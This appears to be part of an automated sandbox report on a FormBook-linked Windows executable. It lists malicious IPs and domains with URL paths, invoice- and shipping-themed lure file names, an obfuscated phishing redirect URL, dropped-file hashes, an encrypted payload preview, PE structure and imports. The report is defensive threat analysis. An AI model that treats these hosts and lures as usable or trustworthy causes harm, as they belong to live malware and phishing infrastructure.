                                                                        • Number of non-executed functions: 306
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 92.204.80.11
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • VT rate limit hit for: fJD7ivEnzm.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        10:34:20API Interceptor6766668x Sleep call for process: netbtugc.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        172.191.244.62jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tekilla.wtf/fpzw/
                                                                        enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                        • www.lurknlarkk.xyz/jqkr/
                                                                        DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                        • www.lurknlarkk.xyz/aol7/
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tekilla.wtf/fpzw/
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tekilla.wtf/fpzw/
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tekilla.wtf/fpzw/
                                                                        PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tekilla.wtf/fpzw/
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tekilla.wtf/fpzw/
                                                                        EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                                                        • www.lurknlarkk.xyz/cjjz/
                                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tekilla.wtf/fpzw/
                                                                        63.250.47.40jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • www.kexweb.top/3bdq/
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • www.kexweb.top/3bdq/
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • www.kexweb.top/3bdq/
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • www.kexweb.top/3bdq/
                                                                        ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.brupack.online/t8b6/
                                                                        PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                        • www.kexweb.top/3bdq/
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • www.kexweb.top/3bdq/
                                                                        k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                                        • www.balclub.top/n6ow/
                                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                        • www.kexweb.top/3bdq/
                                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                        • www.kexweb.top/3bdq/
                                                                        13.248.169.48jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • www.dyme.tech/h7lb/
                                                                        Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                        • www.extrem.tech/lwlk/
                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                        • www.firstcry.shop/e4x0/
                                                                        presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.sleephygienist.org/9ned/
                                                                        -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                        • www.invicta.world/tcs6/
                                                                        payment copy.exeGet hashmaliciousFormBookBrowse
                                                                        • www.firstcry.shop/e4x0/
                                                                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.invicta.world/aohi/
                                                                        shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.mynotebook.shop/3q2o/
                                                                        Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.sapatarias.online/3632/
                                                                        shipping notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.sapatarias.online/3632/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.nobartv6.websitejpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        New_Order_Big_Bag_PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        webredir.vip.gandi.net5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        www.elsupertodo.netjpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        www.kexweb.topjpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ATT-INTERNET4USjpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 172.191.244.62
                                                                        enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                        • 172.191.244.62
                                                                        https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                        • 13.32.23.51
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 13.184.113.170
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 64.216.147.20
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 63.197.31.26
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 68.120.188.218
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 99.178.79.220
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 99.59.85.179
                                                                        https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
                                                                        • 13.32.27.128
                                                                        AMAZON-02UShttps://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAgGet hashmaliciousUnknownBrowse
                                                                        • 52.28.39.231
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 52.222.236.80
                                                                        jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                        • 18.141.10.107
                                                                        PO59458.exeGet hashmaliciousFormBookBrowse
                                                                        • 3.131.150.69
                                                                        Remittance_Raveis.htmGet hashmaliciousUnknownBrowse
                                                                        • 3.160.212.126
                                                                        https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45Get hashmaliciousUnknownBrowse
                                                                        • 3.124.134.230
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 52.222.236.120
                                                                        https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                        • 18.202.131.124
                                                                        FIR-069114.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                        • 3.5.184.28
                                                                        HOSTNETNLjpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        https://polidos.com/Get hashmaliciousUnknownBrowse
                                                                        • 91.184.0.111
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.111
                                                                        firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.184.0.99
                                                                        NAMECHEAP-NETUSZ6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.192.21.169
                                                                        5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.236.169
                                                                        jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        ItPTgiBC07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 198.54.122.135
                                                                        N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.192.19.19
                                                                        q6utlq83i0.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.122.135
                                                                        RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.238.43
                                                                        8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.192.21.169
                                                                        FDA.exeGet hashmaliciousFormBookBrowse
                                                                        • 198.54.125.199
                                                                        PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.38.167

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\01194HH4

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\kinematical

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\fJD7ivEnzm.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):286720
                                                                        Entropy (8bit):7.994432246625071
                                                                        Encrypted:true
                                                                        SSDEEP:6144:opQS3X/b6jTRYqCi34VQ2vW9TSUzWu/48INH:o/QPCioZW5SH8IF
                                                                        MD5:9768A43D3B321CFCA91921C63C558FCD
                                                                        SHA1:9A123976547AC0487BA16CE1F5F63207E865F1C7
                                                                        SHA-256:9F2F66233D42536051255E1335BFDBD7912176279FECD54658EF3440C8C7E3F5
                                                                        SHA-512:8120CE81DDBCCDA5A382E52DD80204616CF70DA2430B247460954C31A981F424D050CB9728E72DD08CDA8E1176948A76D6B8034218B047F457DBA35E038DFDD1
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:..w..4Z1A..]....r.H1...r2I...T7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4.1AH^H.9P.;.k.3....Y(;p'&X77S#j+S(<[..#-p%!Yp,\n..af?[>ToE]]p7PE2NJHKG[.gQ&.m73.m%U.P.hT=.[...hW7.(...&5..X" m73.PE2NJH2F.qZ1.IQW.z.2NJH2FR4.1CI[V_7P.6NJH2FR4Z1Q\PWT'PE2.NH2F.4Z!AHPUT7VE2NJH2FT4Z1AHPWTWTE2LJH2FR4X1..PWD7PU2NJH"FR$Z1AHPWD7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2Nd<W>&4Z1%.TWT'PE2.NH2VR4Z1AHPWT7PE2NjH2&R4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AH

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.5568273994030655
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:fJD7ivEnzm.exe
                                                                        File size:1'393'415 bytes
                                                                        MD5:46bb75d27887b28474a3eb4570d89ca5
                                                                        SHA1:ac12d22d8683b2129c848661eb4c130c99fc8923
                                                                        SHA256:f5d173e1e89e02211fa67806e20fcf4fb9c7dcd656929ffad54840454bae58a9
                                                                        SHA512:137977f7ede7770079f01fd3bc0058b23c589d941214dda8cffa125412820838b42b05ab024d449d973b19f01dfabc169075579a0050853b5cf190437615623a
                                                                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCUS6oefZVmtR8lcsmSI77N8ix5BYInHIAn4:7JZoQrbTFZY1iaCU9+8kSI77bxfX4
                                                                        TLSH:5755F122F9D69036C1B323B19E7FF7AA963D69360336C29723C42D315EA05416B39763
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                        File Icon

                                                                        Icon Hash:1733312925935517

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4165c1
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:0
                                                                        File Version Major:5
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        call 00007F5A888C469Bh
                                                                        jmp 00007F5A888BB50Eh
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push edi
                                                                        push esi
                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                        mov ecx, dword ptr [ebp+10h]
                                                                        mov edi, dword ptr [ebp+08h]
                                                                        mov eax, ecx
                                                                        mov edx, ecx
                                                                        add eax, esi
                                                                        cmp edi, esi
                                                                        jbe 00007F5A888BB68Ah
                                                                        cmp edi, eax
                                                                        jc 00007F5A888BB826h
                                                                        cmp ecx, 00000080h
                                                                        jc 00007F5A888BB69Eh
                                                                        cmp dword ptr [004A9724h], 00000000h
                                                                        je 00007F5A888BB695h
                                                                        push edi
                                                                        push esi
                                                                        and edi, 0Fh
                                                                        and esi, 0Fh
                                                                        cmp edi, esi
                                                                        pop esi
                                                                        pop edi
                                                                        jne 00007F5A888BB687h
                                                                        jmp 00007F5A888BBA62h
                                                                        test edi, 00000003h
                                                                        jne 00007F5A888BB696h
                                                                        shr ecx, 02h
                                                                        and edx, 03h
                                                                        cmp ecx, 08h
                                                                        jc 00007F5A888BB6ABh
                                                                        rep movsd
                                                                        jmp dword ptr [00416740h+edx*4]
                                                                        mov eax, edi
                                                                        mov edx, 00000003h
                                                                        sub ecx, 04h
                                                                        jc 00007F5A888BB68Eh
                                                                        and eax, 03h
                                                                        add ecx, eax
                                                                        jmp dword ptr [00416654h+eax*4]
                                                                        jmp dword ptr [00416750h+ecx*4]
                                                                        nop
                                                                        jmp dword ptr [004166D4h+ecx*4]
                                                                        nop
                                                                        inc cx
                                                                        add byte ptr [eax-4BFFBE9Ah], dl
                                                                        inc cx
                                                                        add byte ptr [ebx], ah
                                                                        ror dword ptr [edx-75F877FAh], 1
                                                                        inc esi
                                                                        add dword ptr [eax+468A0147h], ecx
                                                                        add al, cl
                                                                        jmp 00007F5A8AD33E87h
                                                                        add esi, 03h
                                                                        add edi, 03h
                                                                        cmp ecx, 08h
                                                                        jc 00007F5A888BB64Eh
                                                                        rep movsd
                                                                        jmp dword ptr [00000000h+edx*4]

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [ C ] VS2010 SP1 build 40219
                                                                        • [C++] VS2010 SP1 build 40219
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ASM] VS2010 SP1 build 40219
                                                                        • [RES] VS2010 SP1 build 40219
                                                                        • [LNK] VS2010 SP1 build 40219

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                        RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                        RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                        RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                        RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                        RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                        RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                        RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                        RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                        RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                        RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                        RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                        Imports

                                                                        DLLImport
                                                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
